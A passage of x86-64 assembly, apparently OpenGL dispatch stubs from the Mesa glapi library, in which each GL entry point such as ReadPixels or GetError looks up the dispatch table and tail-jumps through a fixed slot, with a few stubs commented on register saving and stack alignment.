movq 1992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1992(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelStoref), .-GL_PREFIX(PixelStoref)
.p2align 4,,15
.globl GL_PREFIX(PixelStorei)
.type GL_PREFIX(PixelStorei), @function
GL_PREFIX(PixelStorei):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2000(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelStorei), .-GL_PREFIX(PixelStorei)
.p2align 4,,15
.globl GL_PREFIX(PixelMapfv)
.type GL_PREFIX(PixelMapfv), @function
GL_PREFIX(PixelMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2008(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapfv), .-GL_PREFIX(PixelMapfv)
.p2align 4,,15
.globl GL_PREFIX(PixelMapuiv)
.type GL_PREFIX(PixelMapuiv), @function
GL_PREFIX(PixelMapuiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapuiv), .-GL_PREFIX(PixelMapuiv)
.p2align 4,,15
.globl GL_PREFIX(PixelMapusv)
.type GL_PREFIX(PixelMapusv), @function
GL_PREFIX(PixelMapusv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelMapusv), .-GL_PREFIX(PixelMapusv)
.p2align 4,,15
.globl GL_PREFIX(ReadBuffer)
.type GL_PREFIX(ReadBuffer), @function
GL_PREFIX(ReadBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2032(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ReadBuffer), .-GL_PREFIX(ReadBuffer)
.p2align 4,,15
.globl GL_PREFIX(CopyPixels)
.type GL_PREFIX(CopyPixels), @function
GL_PREFIX(CopyPixels):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyPixels), .-GL_PREFIX(CopyPixels)
	.p2align 4,,15
	.globl GL_PREFIX(ReadPixels)
	.type GL_PREFIX(ReadPixels), @function
/*
 * Dispatch stub for glReadPixels(x, y, width, height, format, type,
 *                                pixels).
 * Tail-jumps through dispatch table slot 2048/8 = 256.
 * The first six arguments occupy all SysV integer argument registers
 * (%rdi/%rsi/%rdx/%rcx/%r8/%r9); the 7th is already on the caller's
 * stack and is never touched here.
 */
GL_PREFIX(ReadPixels):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 2048(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* Save all six argument registers; %rbp is padding only, making
	 * 7 pushes so %rsp ends 16-byte aligned at the call. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 2048(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 2048(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 2048(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(ReadPixels), .-GL_PREFIX(ReadPixels)
.p2align 4,,15
.globl GL_PREFIX(DrawPixels)
.type GL_PREFIX(DrawPixels), @function
GL_PREFIX(DrawPixels):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2056(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawPixels), .-GL_PREFIX(DrawPixels)
.p2align 4,,15
.globl GL_PREFIX(GetBooleanv)
.type GL_PREFIX(GetBooleanv), @function
GL_PREFIX(GetBooleanv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetBooleanv), .-GL_PREFIX(GetBooleanv)
.p2align 4,,15
.globl GL_PREFIX(GetClipPlane)
.type GL_PREFIX(GetClipPlane), @function
GL_PREFIX(GetClipPlane):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2072(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetClipPlane), .-GL_PREFIX(GetClipPlane)
.p2align 4,,15
.globl GL_PREFIX(GetDoublev)
.type GL_PREFIX(GetDoublev), @function
GL_PREFIX(GetDoublev):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2080(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetDoublev), .-GL_PREFIX(GetDoublev)
	.p2align 4,,15
	.globl GL_PREFIX(GetError)
	.type GL_PREFIX(GetError), @function
/*
 * Dispatch stub for GLenum glGetError(void).
 * Tail-jumps through dispatch table slot 2088/8 = 261.
 * No arguments, so nothing needs preserving across the getter call.
 */
GL_PREFIX(GetError):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 2088(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* %rbp push/pop is pure padding: one push realigns %rsp to a
	 * 16-byte boundary for the call (entry %rsp % 16 == 8). */
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	movq 2088(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 2088(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	movq 2088(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(GetError), .-GL_PREFIX(GetError)
.p2align 4,,15
.globl GL_PREFIX(GetFloatv)
.type GL_PREFIX(GetFloatv), @function
GL_PREFIX(GetFloatv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2096(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFloatv), .-GL_PREFIX(GetFloatv)
.p2align 4,,15
.globl GL_PREFIX(GetIntegerv)
.type GL_PREFIX(GetIntegerv), @function
GL_PREFIX(GetIntegerv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetIntegerv), .-GL_PREFIX(GetIntegerv)
.p2align 4,,15
.globl GL_PREFIX(GetLightfv)
.type GL_PREFIX(GetLightfv), @function
GL_PREFIX(GetLightfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetLightfv), .-GL_PREFIX(GetLightfv)
.p2align 4,,15
.globl GL_PREFIX(GetLightiv)
.type GL_PREFIX(GetLightiv), @function
GL_PREFIX(GetLightiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetLightiv), .-GL_PREFIX(GetLightiv)
.p2align 4,,15
.globl GL_PREFIX(GetMapdv)
.type GL_PREFIX(GetMapdv), @function
GL_PREFIX(GetMapdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapdv), .-GL_PREFIX(GetMapdv)
.p2align 4,,15
.globl GL_PREFIX(GetMapfv)
.type GL_PREFIX(GetMapfv), @function
GL_PREFIX(GetMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2136(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapfv), .-GL_PREFIX(GetMapfv)
.p2align 4,,15
.globl GL_PREFIX(GetMapiv)
.type GL_PREFIX(GetMapiv), @function
GL_PREFIX(GetMapiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMapiv), .-GL_PREFIX(GetMapiv)
.p2align 4,,15
.globl GL_PREFIX(GetMaterialfv)
.type GL_PREFIX(GetMaterialfv), @function
GL_PREFIX(GetMaterialfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMaterialfv), .-GL_PREFIX(GetMaterialfv)
.p2align 4,,15
.globl GL_PREFIX(GetMaterialiv)
.type GL_PREFIX(GetMaterialiv), @function
GL_PREFIX(GetMaterialiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2160(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMaterialiv), .-GL_PREFIX(GetMaterialiv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapfv)
.type GL_PREFIX(GetPixelMapfv), @function
GL_PREFIX(GetPixelMapfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPixelMapfv), .-GL_PREFIX(GetPixelMapfv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapuiv)
.type GL_PREFIX(GetPixelMapuiv), @function
GL_PREFIX(GetPixelMapuiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2176(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPixelMapuiv), .-GL_PREFIX(GetPixelMapuiv)
.p2align 4,,15
.globl GL_PREFIX(GetPixelMapusv)
.type GL_PREFIX(GetPixelMapusv), @function
GL_PREFIX(GetPixelMapusv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPixelMapusv), .-GL_PREFIX(GetPixelMapusv)
.p2align 4,,15
.globl GL_PREFIX(GetPolygonStipple)
.type GL_PREFIX(GetPolygonStipple), @function
GL_PREFIX(GetPolygonStipple):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2192(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetPolygonStipple), .-GL_PREFIX(GetPolygonStipple)
.p2align 4,,15
.globl GL_PREFIX(GetString)
.type GL_PREFIX(GetString), @function
GL_PREFIX(GetString):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2200(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetString), .-GL_PREFIX(GetString)
.p2align 4,,15
.globl GL_PREFIX(GetTexEnvfv)
.type GL_PREFIX(GetTexEnvfv), @function
GL_PREFIX(GetTexEnvfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2208(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexEnvfv), .-GL_PREFIX(GetTexEnvfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexEnviv)
.type GL_PREFIX(GetTexEnviv), @function
GL_PREFIX(GetTexEnviv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2216(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexEnviv), .-GL_PREFIX(GetTexEnviv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGendv)
.type GL_PREFIX(GetTexGendv), @function
GL_PREFIX(GetTexGendv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGendv), .-GL_PREFIX(GetTexGendv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGenfv)
.type GL_PREFIX(GetTexGenfv), @function
GL_PREFIX(GetTexGenfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGenfv), .-GL_PREFIX(GetTexGenfv)
.p2align 4,,15
.globl GL_PREFIX(GetTexGeniv)
.type GL_PREFIX(GetTexGeniv), @function
GL_PREFIX(GetTexGeniv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexGeniv), .-GL_PREFIX(GetTexGeniv)
.p2align 4,,15
.globl GL_PREFIX(GetTexImage)
.type GL_PREFIX(GetTexImage), @function
GL_PREFIX(GetTexImage):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTexImage), .-GL_PREFIX(GetTexImage)
	.p2align	4,,15
	.globl GL_PREFIX(GetTexParameterfv)
	.type GL_PREFIX(GetTexParameterfv), @function
/* Dispatch stub, table offset 2256.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(GetTexParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2256(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
